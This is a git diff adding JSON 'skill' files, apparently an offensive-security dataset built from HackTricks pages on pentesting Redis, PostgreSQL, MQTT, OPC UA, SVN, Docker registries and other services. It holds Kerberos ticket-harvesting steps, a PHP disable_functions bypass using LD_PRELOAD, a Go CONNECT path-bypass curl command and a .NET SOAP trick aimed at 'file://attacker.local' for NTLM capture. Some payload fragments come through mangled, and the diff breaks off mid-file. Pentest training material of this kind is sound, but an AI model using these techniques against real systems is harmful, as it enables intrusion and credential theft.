diff --git a/skills/network_services_pentesting_29b3f267eba5.json b/skills/network_services_pentesting_29b3f267eba5.json
new file mode 100644
index 0000000..80e97ad
--- /dev/null
+++ b/skills/network_services_pentesting_29b3f267eba5.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_29b3f267eba5",
+ "category": "network-services-pentesting",
+ "title": "6379 pentesting redis",
+ "description": "# 6379 - Pentesting Redis\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFrom [the docs](https://redis.io/topics/introduction): Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker).\n\nBy default Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md).\n\n**Default port:",
+ "payloads": [
+ "# 6379 - Pentesting Redis",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "From [the docs](https://redis.io/topics/introduction): Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker).",
+ "By default Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md).",
+ "**Default port:** 6379",
+ "PORT STATE SERVICE VERSION",
+ "6379/tcp open redis Redis key-value store 4.0.9",
+ "## Automatic Enumeration",
+ "Some automated tools that can help to obtain info from a redis instance:",
+ "```bash",
+ "nmap --script redis-info -sV -p 6379 ",
+ "msf> use auxiliary/scanner/redis/redis_server",
+ "## Manual Enumeration",
+ "### Banner"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/6379-pentesting-redis.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_2bb7e1ed50c2.json b/skills/network_services_pentesting_2bb7e1ed50c2.json
new file mode 100644
index 0000000..4a8482d
--- /dev/null
+++ b/skills/network_services_pentesting_2bb7e1ed50c2.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_2bb7e1ed50c2",
+ "category": "network-services-pentesting",
+ "title": "pentesting postgresql",
+ "description": "# 5432,5433 - Pentesting Postgresql\n\n{{#include ../banners/hacktricks-training.md}}\n\n## **Basic Information**\n\n**PostgreSQL** is described as an **object-relational database system** that is **open source**. This system not only utilizes the SQL language but also enhances it with additional features. Its capabilities allow it to handle a wide range of data types and operations, making it a versatile choice for developers and organizations.\n\n**Default port:** 5432, and if this port is already in ",
+ "payloads": [
+ "# 5432,5433 - Pentesting Postgresql",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "**PostgreSQL** is described as an **object-relational database system** that is **open source**. This system not only utilizes the SQL language but also enhances it with additional features. Its capabilities allow it to handle a wide range of data types and operations, making it a versatile choice for developers and organizations.",
+ "**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use.",
+ "PORT STATE SERVICE",
+ "5432/tcp open pgsql",
+ "## Connect & Basic Enum",
+ "```bash",
+ "psql -U # Open psql console with user",
+ "psql -h -U -d # Remote connection",
+ "psql -h -p -U -W # Remote connection",
+ "```sql",
+ "psql -h localhost -d -U #Password will be prompted",
+ "\\list # List databases"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-postgresql.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_2bebe78e75fd.json b/skills/network_services_pentesting_2bebe78e75fd.json
new file mode 100644
index 0000000..293cf3d
--- /dev/null
+++ b/skills/network_services_pentesting_2bebe78e75fd.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_2bebe78e75fd",
+ "category": "network-services-pentesting",
+ "title": "1883 pentesting mqtt mosquitto",
+ "description": "# 1883 - Pentesting MQTT (Mosquitto)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minim",
+ "payloads": [
+ "# 1883 - Pentesting MQTT (Mosquitto)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial.",
+ "**Default port:** 1883",
+ "PORT STATE SERVICE REASON",
+ "1883/tcp open mosquitto version 1.4.8 syn-ack",
+ "## Inspecting the traffic",
+ "When a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection.",
+ "For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this:",
+ "\"returnCode\": \"0x05\",",
+ "\"description\": \"Connection Refused, not authorized\"",
+ ".png>)",
+ "### [**Brute-Force MQTT**](../generic-hacking/brute-force.md#mqtt)",
+ "## Pentesting MQTT"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_2ce79faf4041.json b/skills/network_services_pentesting_2ce79faf4041.json
new file mode 100644
index 0000000..59df558
--- /dev/null
+++ b/skills/network_services_pentesting_2ce79faf4041.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_2ce79faf4041",
+ "category": "network-services-pentesting",
+ "title": "4840 pentesting opc ua",
+ "description": "# 4840 - Pentesting OPC UA\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## Basic Information\n\n**OPC UA**, standing for **Open Platform Communications Unified Access**, is a crucial open-source protocol used in various industries like Manufacturing, Energy, Aerospace, and Defence for data exchange and equipment control. It uniquely enables different vendors' equipment to communicate, especially with PLCs.\n\nIts configuration allows for strong security measures, but often, for compatibility wi",
+ "payloads": [
+ "# 4840 - Pentesting OPC UA",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**OPC UA**, standing for **Open Platform Communications Unified Access**, is a crucial open-source protocol used in various industries like Manufacturing, Energy, Aerospace, and Defence for data exchange and equipment control. It uniquely enables different vendors' equipment to communicate, especially with PLCs.",
+ "Its configuration allows for strong security measures, but often, for compatibility with older devices, these are lessened, exposing systems to risks. Additionally, finding OPC UA services can be tricky since network scanners might not detect them if they're on nonstandard ports.",
+ "**Default port:** 4840 (binary `opc.tcp`). Many vendors expose separate discovery endpoints (`/discovery`), HTTPS bindings (4843/443), or vendor-specific listener ports such as 49320 (KepServerEX), 62541 (OPC Foundation reference stack) and 48050 (UaGateway). Expect multiple endpoints per host, each advertising transport profile, security policy and user-token support.",
+ "| Built-in NodeId | Why it matters |",
+ "| --- | --- |",
+ "| `i=2253` (`0:Server`) | Holds `ServerArray`, vendor/product strings and namespace URIs.",
+ "| `i=2256` (`ServerStatus`) | Reveals uptime, current state, and optionally build info.",
+ "| `i=2267` (`ServerDiagnosticsSummary`) | Shows session counts, aborted requests, etc. Great for fingerprinting brute-force attempts.",
+ "| `i=85` (`ObjectsFolder`) | Entry point to walk exposed device tags, methods and alarms.",
+ "```text",
+ "PORT STATE SERVICE REASON",
+ "4840/tcp open unknown syn-ack"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/4840-pentesting-opc-ua.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_2d210ce044ee.json b/skills/network_services_pentesting_2d210ce044ee.json
new file mode 100644
index 0000000..7f03d15
--- /dev/null
+++ b/skills/network_services_pentesting_2d210ce044ee.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_2d210ce044ee",
+ "category": "network-services-pentesting",
+ "title": "harvesting tickets from linux",
+ "description": "# Harvesting Tickets from Linux\n\n{{#include ../../banners/hacktricks-training.md}}\n\n### Credential Storage in Linux\n\nLinux systems store credentials in three types of caches, namely **Files** (in `/tmp` directory), **Kernel Keyrings** (a special segment in the Linux kernel), and **Process Memory** (for single-process use). The **default_ccache_name** variable in `/etc/krb5.conf` reveals the storage type in use, defaulting to `FILE:/tmp/krb5cc_%{uid}` if not specified.\n\nMIT/Heimdal also support a",
+ "payloads": [
+ "# Harvesting Tickets from Linux",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "### Credential Storage in Linux",
+ "Linux systems store credentials in three types of caches, namely **Files** (in `/tmp` directory), **Kernel Keyrings** (a special segment in the Linux kernel), and **Process Memory** (for single-process use). The **default_ccache_name** variable in `/etc/krb5.conf` reveals the storage type in use, defaulting to `FILE:/tmp/krb5cc_%{uid}` if not specified.",
+ "MIT/Heimdal also support additional backends that you should look for during post-exploitation:",
+ "- `DIR:/run/user/%{uid}/krb5cc` for directory-backed multi-ticket caches (systemd-logind default on modern distros).",
+ "- `KEYRING:persistent:%{uid}` or `KEYRING:session` to stash ccaches inside the kernel keyring (`KEY_SPEC_SESSION_KEYRING`, `KEY_SPEC_USER_KEYRING`, etc.).",
+ "- `KCM:%{uid}` when SSSD\u2019s Kerberos Cache Manager daemon (kcm) fronts ticket storage.",
+ "- `MEMORY:unique_id` for process-local caches created by libraries (`gssproxy`, `sshd`, etc.).",
+ "Whenever you pop a shell, dump `KRB5CCNAME` from `/proc//environ` of interesting daemons (e.g. Apache, sshd, gssproxy) to know which cache backend is being used before you start copying files.",
+ "### Enumerating Active Caches",
+ "Enumerate the caches before extraction to avoid missing high-value tickets:",
+ "```bash",
+ "$ klist -l # list caches registered in the local keyring/KCM",
+ "$ klist -A # show all ticket-granting tickets in the current cache"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_2d40d8043598.json b/skills/network_services_pentesting_2d40d8043598.json
new file mode 100644
index 0000000..1053476
--- /dev/null
+++ b/skills/network_services_pentesting_2d40d8043598.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_2d40d8043598",
+ "category": "network-services-pentesting",
+ "title": "584 pentesting afp",
+ "description": "# 548 - Pentesting Apple Filing Protocol (AFP)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated",
+ "payloads": [
+ "# 548 - Pentesting Apple Filing Protocol (AFP)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.",
+ "Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:",
+ "* Legacy macOS / Mac OS 9 environments",
+ "* NAS appliances (QNAP, Synology, Western Digital, TrueNAS\u2026) that embed the open-source **Netatalk** daemon",
+ "* Mixed-OS networks where Time-Machine-over-AFP is still enabled",
+ "**Default TCP Port:** **548** (AFP over TCP / DSI)",
+ "```bash",
+ "PORT STATE SERVICE",
+ "548/tcp open afp",
+ "## Enumeration",
+ "### Quick banner / server info",
+ "```bash"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/584-pentesting-afp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_2d5cdd6e628f.json b/skills/network_services_pentesting_2d5cdd6e628f.json
new file mode 100644
index 0000000..879d874
--- /dev/null
+++ b/skills/network_services_pentesting_2d5cdd6e628f.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_2d5cdd6e628f",
+ "category": "network-services-pentesting",
+ "title": "113 pentesting ident",
+ "description": "# 113 - Pentesting Ident\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nThe **Ident Protocol** is used over the **Internet** to associate a **TCP connection** with a specific user. Originally designed to aid in **network management** and **security**, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection.\n\nHowever, due to modern privacy concerns and the potential for misuse, its usage has decrea",
+ "payloads": [
+ "# 113 - Pentesting Ident",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "The **Ident Protocol** is used over the **Internet** to associate a **TCP connection** with a specific user. Originally designed to aid in **network management** and **security**, it operates by allowing a server to query a client on port 113 to request information about the user of a particular TCP connection.",
+ "However, due to modern privacy concerns and the potential for misuse, its usage has decreased as it can inadvertently reveal user information to unauthorized parties. Enhanced security measures, such as encrypted connections and strict access controls, are recommended to mitigate these risks.",
+ "**Default port:** 113",
+ "PORT STATE SERVICE",
+ "113/tcp open ident",
+ "## **Enumeration**",
+ "### **Manual - Get user/Identify the service**",
+ "If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing:",
+ ".png>)",
+ "If you just press enter when you conenct to the service:",
+ ".png>)",
+ "Other errors:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/113-pentesting-ident.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_2e59c80ab32d.json b/skills/network_services_pentesting_2e59c80ab32d.json
new file mode 100644
index 0000000..aba9f4c
--- /dev/null
+++ b/skills/network_services_pentesting_2e59c80ab32d.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_2e59c80ab32d",
+ "category": "network-services-pentesting",
+ "title": "554 8554 pentesting rtsp",
+ "description": "# 554,8554 - Pentesting RTSP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFrom [wikipedia](https://en.wikipedia.org/wiki/Real_Time_Streaming_Protocol):\n\n> The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such",
+ "payloads": [
+ "# 554,8554 - Pentesting RTSP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "From [wikipedia](https://en.wikipedia.org/wiki/Real_Time_Streaming_Protocol):",
+ "> The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording).",
+ "> The transmission of streaming data itself is not a task of RTSP. Most RTSP servers use the Real-time Transport Protocol (RTP) in conjunction with Real-time Control Protocol (RTCP) for media stream delivery. However, some vendors implement proprietary transport protocols. The RTSP server software from RealNetworks, for example, also used RealNetworks' proprietary Real Data Transport (RDT).",
+ "**Default ports:** 554,8554",
+ "PORT STATE SERVICE",
+ "554/tcp open rtsp",
+ "## Key Details",
+ "**RTSP** is similar to HTTP but designed specifically for media streaming. It's defined in a straightforward specification which can be found here:",
+ "[RTSP \u2013 RFC2326](https://tools.ietf.org/html/rfc2326)",
+ "Devices might allow **unauthenticated** or **authenticated** access. To check, a \"DESCRIBE\" request is sent. A basic example is shown below:",
+ "`DESCRIBE rtsp://: RTSP/1.0\\r\\nCSeq: 2`",
+ "Remember, the correct formatting includes a double \"\\r\\n\" for a consistent response. A \"200 OK\" response indicates **unauthenticated access**, while \"401 Unauthorized\" signals the need for authentication, revealing if **Basic** or **Digest authentication** is required."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/554-8554-pentesting-rtsp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_31b2396be659.json b/skills/network_services_pentesting_31b2396be659.json
new file mode 100644
index 0000000..673fedd
--- /dev/null
+++ b/skills/network_services_pentesting_31b2396be659.json
@@ -0,0 +1,26 @@
+{
+ "id": "network_services_pentesting_31b2396be659",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass php safe mode bypass via proc open and custom environment exploit",
+ "description": "# PHP safe_mode bypass via proc_open and custom environment Exploit\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\nFrom [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)\n\n```php\n array(\"pipe\", \"r\"),\n 1 => array(\"file\", $path.\"/output.txt\",\"w\"),\n 2 => array(",
+ "payloads": [
+ "# PHP safe_mode bypass via proc_open and custom environment Exploit",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)",
+ "```php",
+ " array(\"pipe\", \"r\"),",
+ "1 => array(\"file\", $path.\"/output.txt\",\"w\"),",
+ "2 => array(\"file\", $path.\"/errors.txt\", \"a\" )",
+ "); $cwd = '.'; $env = array('LD_PRELOAD' => $path.\"/a.so\"); $process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed sleep(1); $a=fopen($path.\"/.comm1\",\"r\");",
+ "echo \"\";",
+ "while (!feof($a))",
+ "{$b=fgets($a);echo $b;} fclose($a);",
+ "?>;",
+ "",
+ "{{#include ../../../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_32b0f3ffe93d.json b/skills/network_services_pentesting_32b0f3ffe93d.json
new file mode 100644
index 0000000..45ed287
--- /dev/null
+++ b/skills/network_services_pentesting_32b0f3ffe93d.json
@@ -0,0 +1,25 @@
+{
+ "id": "network_services_pentesting_32b0f3ffe93d",
+ "category": "network-services-pentesting",
+ "title": "golang",
+ "description": "# GoLang HTTP CONNECT Method\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## CONNECT method\n\nIn the Go programming language, a common practice when handling HTTP requests, specifically using the `net/http` library, is the automatic conversion of the request path into a standardized format. This process involves:\n\n- Paths ending with a slash (`/`) like `/flag/` are redirected to their non-slash counterpart, `/flag`.\n- Paths containing directory traversal sequences such as `/../flag` are si",
+ "payloads": [
+ "# GoLang HTTP CONNECT Method",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## CONNECT method",
+ "In the Go programming language, a common practice when handling HTTP requests, specifically using the `net/http` library, is the automatic conversion of the request path into a standardized format. This process involves:",
+ "- Paths ending with a slash (`/`) like `/flag/` are redirected to their non-slash counterpart, `/flag`.",
+ "- Paths containing directory traversal sequences such as `/../flag` are simplified and redirected to `/flag`.",
+ "- Paths with a trailing period as in `/flag/.` are also redirected to the clean path `/flag`.",
+ "However, an exception is observed with the use of the `CONNECT` method. Unlike other HTTP methods, `CONNECT` does not trigger the path normalization process. This behavior opens a potential avenue for accessing protected resources. By employing the `CONNECT` method alongside the `--path-as-is` option in `curl`, one can bypass the standard path normalization and potentially reach restricted areas.",
+ "The following command demonstrates how to exploit this behavior:",
+ "```bash",
+ "curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag",
+ "[https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go\\#L2354-L2364](https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364)",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/golang.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_33630b13a4cf.json b/skills/network_services_pentesting_33630b13a4cf.json
new file mode 100644
index 0000000..d49e3ad
--- /dev/null
+++ b/skills/network_services_pentesting_33630b13a4cf.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_33630b13a4cf",
+ "category": "network-services-pentesting",
+ "title": "dotnet soap wsdl client exploitation",
+ "description": "# .NET SOAP/WSDL Client Proxy Abuse\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## TL;DR\n\n- `SoapHttpClientProtocol`, `DiscoveryClientProtocol` and friends inherit from `HttpWebClientProtocol`, whose `GetWebRequest()` returns the scheme-agnostic `WebRequest` instance produced by `WebRequest.Create()` without enforcing `HttpWebRequest`.\n- If an attacker controls the proxy `Url`, the framework silently swaps in `FileWebRequest`, `FtpWebRequest` or UNC/SMB handlers, turning \"HTTP\" proxies i",
+ "payloads": [
+ "# .NET SOAP/WSDL Client Proxy Abuse",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## TL;DR",
+ "- `SoapHttpClientProtocol`, `DiscoveryClientProtocol` and friends inherit from `HttpWebClientProtocol`, whose `GetWebRequest()` returns the scheme-agnostic `WebRequest` instance produced by `WebRequest.Create()` without enforcing `HttpWebRequest`.",
+ "- If an attacker controls the proxy `Url`, the framework silently swaps in `FileWebRequest`, `FtpWebRequest` or UNC/SMB handlers, turning \"HTTP\" proxies into NTLM leak gadgets or arbitrary file writers.",
+ "- Any feature that imports attacker-supplied WSDL with `ServiceDescriptionImporter` compounds the bug: the WSDL controls the generated proxy constructor, SOAP methods, complex types and namespaces, enabling pre-auth RCE (webshells, script drops) in products such as Barracuda Service Center RMM, Ivanti EPM, Umbraco 8, PowerShell and SSIS.",
+ "## Root cause: HttpWebClientProtocol is scheme-agnostic",
+ "`WebClientProtocol.GetWebRequest()` does `var req = WebRequest.Create(uri)` and returns it untouched. `HttpWebClientProtocol.GetWebRequest()` tries `req as HttpWebRequest` to set HTTP-only fields, but it **still returns the original `req`** even when the cast fails. Therefore the runtime obeys whatever scheme is present in `Url`:",
+ "- `http(s)://` \u2192 `HttpWebRequest`",
+ "- `file:///` or `\\\\host\\share\\` \u2192 `FileWebRequest`",
+ "- `ftp://` \u2192 `FtpWebRequest`",
+ "`SoapHttpClientProtocol.Invoke()` then streams the SOAP POST body through whatever transport handler was selected, even if that means writing to disk or over SMB.",
+ "## Primitive 1 \u2013 NTLM capture / relay via UNC targets",
+ "1. Gain control over `SoapHttpClientProtocol.Url` (direct setter, config value, database row, etc.).",
+ "2. Point it to a UNC path like `file://attacker.local/sink/payload`."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/dotnet-soap-wsdl-client-exploitation.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_3532d5eceae6.json b/skills/network_services_pentesting_3532d5eceae6.json
new file mode 100644
index 0000000..da7bb13
--- /dev/null
+++ b/skills/network_services_pentesting_3532d5eceae6.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_3532d5eceae6",
+ "category": "network-services-pentesting",
+ "title": "3690 pentesting subversion svn server",
+ "description": "# 3690/tcp - Pentesting Subversion (SVN) Server\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time ",
+ "payloads": [
+ "# 3690/tcp - Pentesting Subversion (SVN) Server",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time efficiently.",
+ "**Default port:** 3690",
+ "PORT STATE SERVICE",
+ "3690/tcp open svnserve Subversion",
+ "### Banner Grabbing",
+ "nc -vn 10.10.10.10 3690",
+ "## Enumeration",
+ "```bash",
+ "svn ls svn://10.10.10.203 #list",
+ "svn log svn://10.10.10.203 #Commit history",
+ "svn checkout svn://10.10.10.203 #Download the repository",
+ "svn up -r 2 #Go to revision 2 inside the checkout folder"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_35542f23512b.json b/skills/network_services_pentesting_35542f23512b.json
new file mode 100644
index 0000000..a508424
--- /dev/null
+++ b/skills/network_services_pentesting_35542f23512b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_35542f23512b",
+ "category": "network-services-pentesting",
+ "title": "types of mssql users",
+ "description": "# Types of MSSQL Users\n\n{{#include ../../banners/hacktricks-training.md}}\n\nTable taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16).\n\n| Column name | Data type | Description ",
+ "payloads": [
+ "# Types of MSSQL Users",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Table taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16).",
+ "| Column name | Data type | Description |",
+ "| --------------------------------------- | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |",
+ "| **name** | **sysname** | Name of principal, unique within the database. |",
+ "| **principal_id** | **int** | ID of principal, unique within the database. |",
+ "| **type** | **char(1)** |
Principal type:
A = Application role
C = User mapped to a certificate
E = External user from Azure Active Directory
G = Windows group
K = User mapped to an asymmetric key
R = Database role
S = SQL user
U = Windows user
X = External group from Azure Active Directory group or applications
|",
+ "| **type_desc** | **nvarchar(60)** |
Description of principal type.
APPLICATION_ROLE
CERTIFICATE_MAPPED_USER
EXTERNAL_USER
WINDOWS_GROUP
ASYMMETRIC_KEY_MAPPED_USER
DATABASE_ROLE
SQL_USER
WINDOWS_USER
EXTERNAL_GROUPS
|",
+ "| **default_schema_name** | **sysname** | Name to be used when SQL name does not specify a schema. Null for principals not of type S, U, or A. |",
+ "| **create_date** | **datetime** | Time at which the principal was created. |",
+ "| **modify_date** | **datetime** | Time at which the principal was last modified. |",
+ "| **owning_principal_id** | **int** | ID of the principal that owns this principal. All fixed Database Roles are owned by **dbo** by default. |",
+ "| **sid** | **varbinary(85)** | SID (Security Identifier) of the principal. NULL for SYS and INFORMATION SCHEMAS. |",
+ "| **is_fixed_role** | **bit** | If 1, this row represents an entry for one of the fixed database roles: db_owner, db_accessadmin, db_datareader, db_datawriter, db_ddladmin, db_securityadmin, db_backupoperator, db_denydatareader, db_denydatawriter. |"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_39401ba58041.json b/skills/network_services_pentesting_39401ba58041.json
new file mode 100644
index 0000000..244e3f5
--- /dev/null
+++ b/skills/network_services_pentesting_39401ba58041.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_39401ba58041",
+ "category": "network-services-pentesting",
+ "title": "5000 pentesting docker registry",
+ "description": "# 5000 - Pentesting Docker Registry\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nA storage and distribution system known as a **Docker registry** is in place for Docker images that are named and may come in multiple versions, distinguished by tags. These images are organized within **Docker repositories** in the registry, each repository storing various versions of a specific image. The functionality provided allows for images to be downloaded locally or uploaded to the",
+ "payloads": [
+ "# 5000 - Pentesting Docker Registry",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "A storage and distribution system known as a **Docker registry** is in place for Docker images that are named and may come in multiple versions, distinguished by tags. These images are organized within **Docker repositories** in the registry, each repository storing various versions of a specific image. The functionality provided allows for images to be downloaded locally or uploaded to the registry, assuming the user has the necessary permissions.",
+ "**DockerHub** serves as the default public registry for Docker, but users also have the option to operate an on-premise version of the open-source Docker registry/distribution or opt for the commercially supported **Docker Trusted Registry**. Additionally, various other public registries can be found online.",
+ "To download an image from an on-premise registry, the following command is used:",
+ "```bash",
+ "docker pull my-registry:9000/foo/bar:2.1",
+ "This command fetches the `foo/bar` image version `2.1` from the on-premise registry at the `my-registry` domain on port `9000`. Conversely, to download the same image from DockerHub, particularly if `2.1` is the latest version, the command simplifies to:",
+ "```bash",
+ "docker pull foo/bar",
+ "**Default port:** 5000",
+ "PORT STATE SERVICE VERSION",
+ "5000/tcp open http Docker Registry (API: 2.0)",
+ "## Discovering"
+ ],
+ "source": "HackTricks",
+ "references": [
